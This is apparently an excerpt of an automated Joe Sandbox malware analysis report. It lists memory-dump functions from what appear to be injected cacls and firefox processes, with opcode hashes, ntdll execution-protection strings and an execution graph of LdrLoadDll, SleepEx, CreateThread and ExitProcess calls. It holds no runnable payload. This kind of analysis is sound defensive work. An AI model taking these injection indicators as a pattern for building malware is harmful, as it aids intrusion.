                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 7f4e991dee68ae1c7be8a91418528fa3bd9fd9f4bab8dc29edf2a04cd2693262
                                                                                                    • Instruction ID: d56a37635e1e2d4b3a073d7cfa1712fb2b451ae8ff7c509286c1c9b34579c01d
                                                                                                    • Opcode Fuzzy Hash: 7f4e991dee68ae1c7be8a91418528fa3bd9fd9f4bab8dc29edf2a04cd2693262
                                                                                                    • Instruction Fuzzy Hash: 23B092729824D5CAEB12EB704B0CB1B7A10ABD0706F66D466E2470681E8B38C095F276
                                                                                                    Function 001284D6 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815523871628.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_110000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3454d9b2357c179a0bbcebf14664294c3e02c771aeab481c4cf5af9b6078be89
                                                                                                    • Instruction ID: 8fbe9f6b660f879b5ce44d815d417dca148d0714575284ab1915b881683fc940
                                                                                                    • Opcode Fuzzy Hash: 3454d9b2357c179a0bbcebf14664294c3e02c771aeab481c4cf5af9b6078be89
                                                                                                    • Instruction Fuzzy Hash: D9E0262AD4472D8E8323FE6481859997BA4BEC4150B17458D84D00B46ACD2161A1D7D3

                                                                                                    Non-executed Functions

                                                                                                    Function 02E17550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E54530
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E54460
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E54507
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E54592
                                                                                                    • Execute=1, xrefs: 02E5451E
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E5454D
                                                                                                    • ExecuteOptions, xrefs: 02E544AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: 061c72c6b6699e9960a13139bb6b5c49692369e8f8ded6470b9c4382687c2622
                                                                                                    • Instruction ID: 8067488c9d4ef3e6cd38f750ab03dd07a9173251a3937105cae39e5dff06e47d
                                                                                                    • Opcode Fuzzy Hash: 061c72c6b6699e9960a13139bb6b5c49692369e8f8ded6470b9c4382687c2622
                                                                                                    • Instruction Fuzzy Hash: 69512A31AC02296AEF10AF94EC49FE9B369EF04748F0494B9E506A71C1EB709E44CE50
                                                                                                    Function 02DE9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2db0000_cacls.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$@
                                                                                                    • API String ID: 0-1194432280
                                                                                                    • Opcode ID: e7fbb8ff913edea301a2f699055aa283fcbb64cfb6a16e5f7d105d30e1d32f50
                                                                                                    • Instruction ID: 7e99036aee552b12316e65e51152a9b03c9c5ee07f5677da3e930b2a23a7ac6e
                                                                                                    • Opcode Fuzzy Hash: e7fbb8ff913edea301a2f699055aa283fcbb64cfb6a16e5f7d105d30e1d32f50
                                                                                                    • Instruction Fuzzy Hash: F4813A71D412699BDB31DB54DC44BEEB7B8AF08714F0081EAEA0AB7250D7309E84CFA0

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:4.4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:20
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 5245 14045e3ba52 5246 14045e3b9f6 5245->5246 5247 14045e3ba58 5245->5247 5246->5246 5248 14045e3bac0 LdrLoadDll 5247->5248 5249 14045e3ba84 5247->5249 5248->5249 5250 14045e32598 5253 14045e325b4 5250->5253 5251 14045e3264a 5252 14045e325db SleepEx 5252->5253 5253->5251 5253->5252 5254 14045e420a8 5257 14045e3dff8 5254->5257 5256 14045e420bd 5259 14045e3e004 5257->5259 5258 14045e3e009 5258->5256 5259->5258 5261 14045e3e0e3 5259->5261 5263 14045e31948 5259->5263 5261->5258 5262 14045e3e151 ExitProcess 5261->5262 5264 14045e31967 5263->5264 5265 14045e319f2 5264->5265 5266 14045e319c4 CreateThread 5264->5266 5265->5261 5266->5261

                                                                                                    Executed Functions

                                                                                                    Function 0000014045E3DFE9 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c8ec628401736e13643e511e12bbebbebbca855714d3417a801050835506631
                                                                                                    • Instruction ID: 9d18586d697f69ec402f0d791990995ab946970c5d231c68f00e354130c117b7
                                                                                                    • Opcode Fuzzy Hash: 1c8ec628401736e13643e511e12bbebbebbca855714d3417a801050835506631
                                                                                                    • Instruction Fuzzy Hash: 4E416F306047485AEBAEAB2785813EA72E1AB89300F4805799B49C7AE7DE36D6448752
                                                                                                    Function 0000014045E3DFCF Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: 89bea2fa8af9914d184ed2e597c03fb9e2b5ea39eb452cc0f843c231783944a8
                                                                                                    • Instruction ID: d651bde56a456a4fae12909dd8ac559fad6dd4b95246cd99387f5e1ea7d9ed01
                                                                                                    • Opcode Fuzzy Hash: 89bea2fa8af9914d184ed2e597c03fb9e2b5ea39eb452cc0f843c231783944a8
                                                                                                    • Instruction Fuzzy Hash: 8A3191302047489AEB6AAB27C5853EA72E1FB89300F48057C9F49C7AE7CB36D6448742
                                                                                                    Function 0000014045E3BA52 Relevance: 1.6, APIs: 1, Instructions: 99libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                                    • Instruction ID: da013a54c030de9c73221700c22dc7d69a967ce1314ef44f4e2d5efecfc1d938
                                                                                                    • Opcode Fuzzy Hash: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                                    • Instruction Fuzzy Hash: 45312830618E484BEB49EB17C4C87FAB7D5FB9C301F48461ADB4AC70A1DA37D6458741
                                                                                                    Function 0000014045E31943 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                                    • Instruction ID: 8b4c6c0dce7cb589234862ccec0b7a808e2253bb506d0b56b81b36cf7207237f
                                                                                                    • Opcode Fuzzy Hash: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                                    • Instruction Fuzzy Hash: D011E43111C6444FE74DDF29E0863E5B7D0EB59314F08066DDB89CB5A2EA37D1428742
                                                                                                    Function 0000014045E32598 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                                    • Instruction ID: 56b2f58010dd619c791fc6c89d05a6444c1d7f8cd4f62d6482c3960e8fedb1e5
                                                                                                    • Opcode Fuzzy Hash: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                                    • Instruction Fuzzy Hash: 452163305146085FEB9A9B2A80957ED72D2FB4C700F48057DAF8AC75A7CE368A814682
                                                                                                    Function 0000014045E31948 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.812028549691.0000014045E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000014045E00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_14045e00000_firefox.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2422867632-0
                                                                                                    • Opcode ID: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                                    • Instruction ID: 0a14adf767d526b283e46e7f4a1e05f486c305c1468fef08f2dfae58ba74dc5b
                                                                                                    • Opcode Fuzzy Hash: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                                    • Instruction Fuzzy Hash: 3911C2301146045BE789EF29C0893E6B6D0EB4C344F08463DD749CB2A6DF36C5818751